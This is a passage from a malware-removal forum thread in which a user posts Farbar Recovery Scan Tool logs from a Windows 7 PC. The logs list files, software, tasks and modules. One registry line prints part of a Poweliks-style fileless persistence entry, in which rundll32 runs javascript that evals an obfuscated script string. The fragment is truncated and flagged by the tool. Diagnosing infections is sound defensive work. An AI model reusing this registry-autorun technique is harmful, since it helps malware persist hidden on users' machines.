2014-10-19 12:54 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-19 12:54 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-19 12:54 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-19 12:54 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-19 12:54 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-19 12:54 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-19 12:54 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-19 12:54 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-19 12:54 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-19 12:54 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-19 12:54 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-19 12:54 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-19 12:54 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-19 12:54 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-19 12:54 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-19 12:54 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-19 12:54 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-19 12:54 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-19 12:54 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-19 12:54 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-19 12:54 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-19 12:54 - 2014-05-30 01:08 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2014-10-19 12:54 - 2014-05-30 01:08 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2014-10-19 12:54 - 2014-05-30 00:52 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-06 08:10 - 2013-08-21 15:52 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-11-06 08:09 - 2013-08-21 15:44 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-06 08:09 - 2011-06-29 11:51 - 00044306 _____ () C:\Windows\setupact.log
2014-11-06 08:08 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 19:47 - 2013-08-16 16:54 - 01084339 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 19:18 - 2013-08-21 15:23 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-02 19:06 - 2009-07-13 21:45 - 00025632 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-02 19:06 - 2009-07-13 21:45 - 00025632 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-02 19:05 - 2009-07-13 22:13 - 00784286 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-02 19:03 - 2013-08-21 15:44 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-02 19:02 - 2013-08-30 17:02 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\ActiveDossierUploader
2014-11-02 19:01 - 2013-09-15 21:05 - 00000370 _____ () C:\Windows\Tasks\WpsUpdateTask_Joe.job
2014-11-02 19:00 - 2014-04-19 12:58 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\Raptr
2014-11-02 18:59 - 2013-08-21 21:36 - 00000000 ____D () C:\ProgramData\Origin
2014-11-02 18:59 - 2013-08-21 21:36 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-11-02 16:49 - 2013-09-14 09:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-02 15:09 - 2013-08-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-11-02 09:43 - 2013-08-21 19:50 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\TS3Client
2014-11-01 23:49 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-27 20:58 - 2013-08-21 15:44 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-21 20:19 - 2010-11-20 20:47 - 00288312 _____ () C:\Windows\PFRO.log
2014-10-21 20:17 - 2013-08-21 15:25 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 20:16 - 2014-03-31 15:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 20:16 - 2013-08-21 15:25 - 00000000 ___HD () C:\$AVG
2014-10-21 06:58 - 2013-08-21 15:44 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 06:58 - 2013-08-21 15:44 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 03:21 - 2009-07-13 21:45 - 00266992 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-20 03:01 - 2013-08-25 00:01 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 03:00 - 2013-08-25 00:01 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-19 12:49 - 2014-04-19 12:58 - 00000000 ____D () C:\Program Files (x86)\Raptr

Files to move or delete:
====================
C:\ProgramData\reg546ms.dll

Some content of TEMP:
====================
C:\Users\Joe\AppData\Local\Temp\13-12_win7_win8_64_dd_ccc_whql.exe
C:\Users\Joe\AppData\Local\Temp\raptrpatch.exe
C:\Users\Joe\AppData\Local\Temp\sonarinst.exe
C:\Users\Joe\AppData\Local\Temp\stuprt.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-13 18:35

==================== End Of Log ============================


  • 0

#4
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Posted below is the Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by Joe at 2014-11-06 08:11:11
Running from C:\Users\Joe\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{C2956908-53A3-88FC-B795-B16508296FC4}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.4.0 - EA Digital Illusions CE AB)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Brother MFL-Pro Suite MFC-7840W (HKLM-x32\...\{46E1B1F2-A279-4356-9B17-029F9CC72EAE}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
Combat Mission Battle for Normandy (HKLM-x32\...\CMBN10_is1) (Version:  - Battlefront.com)
Conflict of Heroes Awakening the Bear (HKLM-x32\...\Conflict of Heroes Awakening the Bear1.10) (Version: 1.10 - Matrix Games)
Conflict of Heroes Ghost Divisions (HKLM-x32\...\Conflict of Heroes Ghost Divisions1.30) (Version: 1.30 - Matrix Games)
Corsair K90 Firmware Update Application (HKLM-x32\...\{07309579-6D30-4769-A5D2-A8B0DCBDD59A}_is1) (Version:  - )
Corsair K90 Gaming Keyboard Driver V1.0 (HKLM-x32\...\{E87D1F6D-954D-4BB4-B49D-D394EB460A09}_is1) (Version: 1.00.00.39 - )
Crusader Kings II (HKLM-x32\...\Steam App 203770) (Version:  - Paradox Development Studio)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
Futuremark SystemInfo (HKLM-x32\...\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.0.0.0 - Futuremark Corporation)
GameMaker-Studio 1.2 (HKCU\...\GameMaker-Studio12) (Version:  - YoYo Games Ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.10.1300 - Intel Corporation)
Intel® Network Connections 17.2.154.0 (HKLM\...\PROSetDX) (Version: 17.2.154.0 - Intel)
Intel® Rapid Storage Technology enterprise (HKLM-x32\...\{8B313BF5-9BD5-42a3-94C1-A28AF3AA51CC}) (Version: 3.5.0.1092 - Intel Corporation)
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Kingsoft Office 2013 (9.1.0.4246) (HKLM-x32\...\Kingsoft Office) (Version: 9.1.0.4246 - Kingsoft Corp.)
Logitech Gaming Software 8.46 (HKLM\...\Logitech Gaming Software) (Version: 8.46.27 - Logitech Inc.)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 3.0.40624.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
NETGEAR WG111v3 wireless USB 2.0 adapter (HKLM-x32\...\InstallShield_{5396FBD8-8BD7-47F9-92AE-F62F13D5A11D}) (Version: 1.01.10 - NETGEAR)
NETGEAR WG111v3 wireless USB 2.0 adapter (x32 Version: 1.01.10 - NETGEAR) Hidden
Neverwinter Nights 2 (HKLM-x32\...\{F20C1251-1D0A-4944-B2AE-678581B33B19}) (Version: 1.00.0000 - Obsidian)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.52.1 - Black Tree Gaming)
Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6793 - Realtek Semiconductor Corp.)
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{17528CE4-C333-48FB-A9E4-D841E795CDCE}) (Version: 3.0.23.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 3.0.23.0 - Renesas Electronics Corporation) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.1.21 - Safer-Networking Ltd.)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
Tomb Raider (HKLM-x32\...\Steam App 203160) (Version:  - Crystal Dynamics)
Uplay (HKLM-x32\...\Uplay) (Version: 3.0 - Ubisoft)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Warface (HKLM-x32\...\Steam App 291480) (Version:  - Crytek GmbH)
Wargame: AirLand Battle (HKLM-x32\...\Steam App 222750) (Version:  - Eugen Systems)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM-x32\...\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
World of Tanks (HKLM-x32\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812NA}_is1) (Version:  - Wargaming.net)
Wot Numbers (HKLM-x32\...\{2A110E91-EC9B-4F1C-B32B-41A72B5142BA}) (Version: 0.6.2.0 - Wot Numbers Team)
WOT Statistics 2.5.0.5 (HKLM-x32\...\{A3B58AC5-1306-4452-837A-E96F0DC80662}) (Version: 2.5.0.5 - vBAddict)
WOT Statistics 2.5.0.8 (HKLM-x32\...\{9C838089-F10C-4960-BCC1-D1FAAC8E2BF7}) (Version: 2.5.0.8 - vBAddict)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3603006954-300617725-3809153182-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

01-11-2014 17:12:33 Installed Wot Numbers
02-11-2014 16:52:57 Installed Wot Numbers

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {26A75BF6-E5B1-4012-8B44-72429F378DDB} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {5DD6FE5A-DFAC-4EBD-9538-DC8674389A1A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: {B9B5EF74-F5A3-4E7D-B0E8-CFA0BF60DAF0} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {BA464AD4-A5C8-41C9-924C-ECCD2C6777FC} - System32\Tasks\WpsUpdateTask_Joe => D:\Program Files (x86)\Kingsoft\Kingsoft Office\wtoolex\wpsupdate.exe [2014-08-06] (Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {BBD372E5-C5DB-4FDC-807E-BD15BEAE802D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-21] (Google Inc.)
Task: {E39D0860-8123-4ADE-BD71-B8001AE46F44} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDImmunize.exe
Task: {F62125E8-D41A-4591-883F-97DBE898AA3D} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\WpsUpdateTask_Joe.job => D:\Program Files (x86)\Kingsoft\Kingsoft Office\wtoolex\wpsupdate.exe

==================== Loaded Modules (whitelisted) =============

2014-08-16 16:44 - 2014-08-16 16:44 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2013-09-22 21:05 - 2005-04-22 13:36 - 00143360 _____ () C:\Windows\system32\BrSNMP64.dll
2009-11-06 14:36 - 2009-11-06 14:36 - 02469888 _____ () C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe
2013-09-22 21:05 - 2012-09-25 11:26 - 01163264 _____ () C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
2013-08-21 15:04 - 2013-05-16 10:55 - 00113496 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2013-08-21 15:04 - 2013-05-16 10:55 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2013-08-21 15:04 - 2013-05-16 10:55 - 00161112 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2013-08-21 15:04 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2013-08-21 15:04 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00962560 _____ () C:\Program Files (x86)\Origin\platforms\qwindows.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00024064 _____ () C:\Program Files (x86)\Origin\imageformats\qgif.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00025088 _____ () C:\Program Files (x86)\Origin\imageformats\qico.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00217088 _____ () C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00261632 _____ () C:\Program Files (x86)\Origin\imageformats\qmng.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00019968 _____ () C:\Program Files (x86)\Origin\imageformats\qtga.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00302592 _____ () C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2014-02-02 00:15 - 2014-09-19 21:24 - 00018944 _____ () C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2009-03-04 09:52 - 2009-03-04 09:52 - 00372736 _____ () C:\Program Files (x86)\NETGEAR\WG111v3\WlanDll.dll
2008-12-29 17:13 - 2008-12-29 17:13 - 00204800 _____ () C:\Program Files (x86)\NETGEAR\WG111v3\KJLog.dll
2013-08-21 15:32 - 2012-05-14 12:39 - 00043008 _____ () C:\Program Files (x86)\Corsair\K90 Keyboard\hidGetKey.dll
2013-09-22 21:05 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2010-11-22 15:56 - 2010-11-22 15:56 - 00087040 _____ () C:\Program Files (x86)\Raptr\_ctypes.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00043008 _____ () C:\Program Files (x86)\Raptr\_socket.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00805376 _____ () C:\Program Files (x86)\Raptr\_ssl.pyd
2014-05-13 16:26 - 2014-05-13 16:26 - 05812736 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtGui.pyd
2014-05-13 16:26 - 2014-05-13 16:26 - 00067584 _____ () C:\Program Files (x86)\Raptr\sip.pyd
2014-05-13 16:26 - 2014-05-13 16:26 - 01662464 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtCore.pyd
2014-05-13 16:26 - 2014-05-13 16:26 - 00494592 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtNetwork.pyd
2010-11-22 15:57 - 2010-11-22 15:57 - 00096256 _____ () C:\Program Files (x86)\Raptr\win32api.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00110592 _____ () C:\Program Files (x86)\Raptr\pywintypes26.dll
2010-11-22 15:56 - 2010-11-22 15:56 - 00010240 _____ () C:\Program Files (x86)\Raptr\select.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00356864 _____ () C:\Program Files (x86)\Raptr\_hashlib.pyd
2010-11-22 15:57 - 2010-11-22 15:57 - 00036352 _____ () C:\Program Files (x86)\Raptr\win32process.pyd
2010-11-22 15:57 - 2010-11-22 15:57 - 00111104 _____ () C:\Program Files (x86)\Raptr\win32file.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00044544 _____ () C:\Program Files (x86)\Raptr\_sqlite3.pyd
2011-02-15 11:17 - 2011-02-15 11:17 - 00417501 _____ () C:\Program Files (x86)\Raptr\sqlite3.dll
2010-11-22 15:57 - 2010-11-22 15:57 - 00167936 _____ () C:\Program Files (x86)\Raptr\win32gui.pyd
2014-05-13 16:26 - 2014-05-13 16:26 - 00313856 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtWebKit.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00127488 _____ () C:\Program Files (x86)\Raptr\pyexpat.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00009216 _____ () C:\Program Files (x86)\Raptr\winsound.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00354304 _____ () C:\Program Files (x86)\Raptr\pythoncom26.dll
2010-11-22 15:57 - 2010-11-22 15:57 - 00016384 _____ () C:\Program Files (x86)\Raptr\win32trace.pyd
2010-11-22 15:56 - 2010-11-22 15:56 - 00583680 _____ () C:\Program Files (x86)\Raptr\unicodedata.pyd
2010-11-22 15:57 - 2010-11-22 15:57 - 00141312 _____ () C:\Program Files (x86)\Raptr\gobject._gobject.pyd
2014-06-17 17:56 - 2014-06-17 17:56 - 02717595 _____ () C:\Program Files (x86)\Raptr\heliotrope._purple.pyd
2011-02-15 11:17 - 2011-02-15 11:17 - 01213633 _____ () C:\Program Files (x86)\Raptr\libxml2-2.dll
